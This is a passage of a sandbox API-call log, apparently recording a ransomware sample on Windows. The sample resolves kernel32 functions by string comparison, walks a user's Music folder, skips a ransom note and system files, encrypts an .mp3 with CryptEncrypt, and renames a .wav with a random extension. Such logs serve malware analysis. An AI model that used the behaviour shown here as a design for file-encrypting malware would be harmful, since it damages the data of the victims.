lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0085.863] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0085.863] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0085.863] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0085.863] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0085.863] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0085.863] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0085.863] lstrlenA (lpString="DELETEATOM") returned 10 [0085.863] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0085.863] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0085.863] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0085.863] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0085.863] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0085.863] lstrlenA (lpString="DELETEFIBER") returned 11 [0085.863] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0085.863] lstrlenA (lpString="DELETEFILEA") returned 11 [0085.863] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0085.863] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0085.863] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0085.863] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0085.863] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0085.863] lstrlenA (lpString="DELETEFILEW") returned 11 [0085.863] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0085.863] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0085.863] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0085.864] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0085.864] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0085.864] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0085.864] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0085.864] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0085.864] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0085.864] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0085.864] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0085.864] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0085.864] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0085.864] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0085.864] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0085.864] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0085.864] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0085.864] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0085.864] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0085.864] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0085.864] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0085.864] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0085.864] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0085.864] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0085.864] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0085.864] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0085.864] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0085.864] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0085.864] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0085.864] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0085.864] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0085.864] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0085.864] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0085.864] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0085.864] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0085.864] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0085.864] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0085.864] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0085.864] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0085.864] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0085.865] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0085.865] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0085.865] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0085.865] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0085.865] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0085.865] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0085.865] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0085.865] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0085.865] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0085.865] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0085.865] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0085.865] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0085.865] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0085.865] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0085.865] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0085.865] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0085.865] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0085.865] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0085.865] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0085.865] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0085.865] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0085.865] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0085.865] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0085.865] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0085.865] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0085.865] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0085.865] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0085.865] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.866] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\_GY3M0t4Il.wav") returned 92 [0085.866] wsprintfW (in: param_1=0x3f2d9ac, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\_GY3M0t4Il.wav.0OcFr") returned 98 [0085.866] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\_GY3M0t4Il.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\sksccrt5mdqwsozl\\_gy3m0t4il.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\SkSCcRt5MdQwSoZl\\_GY3M0t4Il.wav.0OcFr" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\sksccrt5mdqwsozl\\_gy3m0t4il.wav.0ocfr"), dwFlags=0x0) returned 1 [0085.866] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.866] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.867] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.867] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc187b0, ftCreationTime.dwHighDateTime=0x1d4d28a, ftLastAccessTime.dwLowDateTime=0xf2627720, ftLastAccessTime.dwHighDateTime=0x1d4d57b, ftLastWriteTime.dwLowDateTime=0xf2627720, ftLastWriteTime.dwHighDateTime=0x1d4d57b, nFileSizeHigh=0x0, nFileSizeLow=0x15a24, dwReserved0=0x0, dwReserved1=0x0, cFileName="_GY3M0t4Il.wav", cAlternateFileName="_GY3M0~1.WAV")) returned 0 [0085.867] FindClose (in: hFindFile=0x5f8b58 | out: hFindFile=0x5f8b58) returned 1 [0085.867] CloseHandle (hObject=0x438) returned 1 [0085.867] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabc4ebb0, ftCreationTime.dwHighDateTime=0x1d4cf11, ftLastAccessTime.dwLowDateTime=0xaa07fbc0, ftLastAccessTime.dwHighDateTime=0x1d4d27a, ftLastWriteTime.dwLowDateTime=0xaa07fbc0, ftLastWriteTime.dwHighDateTime=0x1d4d27a, nFileSizeHigh=0x0, nFileSizeLow=0x6ceb, dwReserved0=0x0, dwReserved1=0x0, cFileName="UJdL.mp3", cAlternateFileName="")) returned 1 [0085.867] lstrcmpiW (lpString1="UJdL.mp3", lpString2="DECRYPT-FILES.txt") returned 1 [0085.867] lstrcmpiW (lpString1="UJdL.mp3", lpString2="autorun.inf") returned 1 [0085.867] lstrcmpiW (lpString1="UJdL.mp3", lpString2="boot.ini") returned 1 [0085.867] lstrcmpiW (lpString1="UJdL.mp3", lpString2="desktop.ini") returned 1 [0085.867] lstrcmpiW (lpString1="UJdL.mp3", lpString2="ntuser.dat") returned 1 [0085.867] lstrcmpiW (lpString1="UJdL.mp3", lpString2="iconcache.db") returned 1 [0085.867] lstrcmpiW (lpString1="UJdL.mp3", lpString2="bootsect.bak") returned 1 [0085.867] lstrcmpiW (lpString1="UJdL.mp3", lpString2="ntuser.dat.log") returned 1 [0085.867] lstrcmpiW (lpString1="UJdL.mp3", lpString2="thumbs.db") returned 1 [0085.867] lstrcmpiW (lpString1="UJdL.mp3", lpString2="Bootfont.bin") returned 1 [0085.867] lstrlenW (lpString="UJdL.mp3") returned 8 [0085.867] lstrcmpiW (lpString1="mp3", lpString2="lnk") returned 1 [0085.867] lstrcmpiW (lpString1="mp3", lpString2="exe") returned 1 [0085.867] lstrcmpiW (lpString1="mp3", lpString2="sys") returned -1 [0085.867] lstrcmpiW (lpString1="mp3", lpString2="dll") returned 1 [0085.867] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned 61 [0085.867] lstrlenW (lpString="UJdL.mp3") returned 8 [0085.867] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\" [0085.868] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\", lpString2="UJdL.mp3" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\UJdL.mp3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\UJdL.mp3" [0085.868] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.868] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zUt2ThE-zNirRyoAwYp\\COGT\\UJdL.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zut2the-znirryoawyp\\cogt\\ujdl.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0085.868] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2dbf0 | out: lpFileSize=0x3f2dbf0*=27883) returned 1 [0085.868] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0085.868] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.868] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.868] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.868] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.869] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2db58*=0x100) returned 1 [0085.869] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.870] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.870] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.870] CloseHandle (hObject=0x43c) returned 1 [0085.870] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.870] WriteFile (in: hFile=0x438, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2db78, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2db78*=0x108, lpOverlapped=0x0) returned 1 [0085.871] CloseHandle (hObject=0x0) returned 0 [0085.871] CloseHandle (hObject=0x438) returned 1 [0085.871] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.871] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.872] GetTickCount () returned 0x114debc [0085.872] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.872] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.872] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.872] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.872] lstrlenA (lpString="kernel32.dll") returned 12 [0085.873] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0085.873] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0085.873] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0085.873] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0085.873] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0085.873] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0085.873] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0085.873] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0085.873] lstrlenA (lpString="ADDATOMA") returned 8 [0085.873] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0085.873] lstrlenA (lpString="ADDATOMW") returned 8 [0085.873] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0085.873] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0085.873] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0085.873] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0085.873] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0085.873] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0085.873] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0085.873] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0085.873] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0085.873] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0085.873] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0085.873] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0085.873] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0085.873] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0085.873] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0085.873] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0085.873] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0085.873] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0085.873] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0085.873] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0085.873] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0085.874] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0085.874] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0085.874] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0085.874] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0085.874] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0085.874] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0085.874] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0085.874] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0085.874] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0085.874] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0085.874] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0085.874] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0085.874] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0085.874] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0085.874] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0085.874] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0085.874] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0085.874] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0085.874] lstrlenA (lpString="BACKUPREAD") returned 10 [0085.874] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0085.874] lstrlenA (lpString="BACKUPSEEK") returned 10 [0085.874] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0085.874] lstrlenA (lpString="BACKUPWRITE") returned 11 [0085.874] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0085.874] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0085.874] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0085.874] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0085.874] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0085.874] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0085.874] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0085.874] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0085.874] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0085.874] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0085.874] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0085.874] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0085.874] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0085.875] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0085.875] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0085.875] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0085.875] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0085.875] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0085.875] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0085.875] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0085.875] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0085.875] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0085.875] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0085.875] 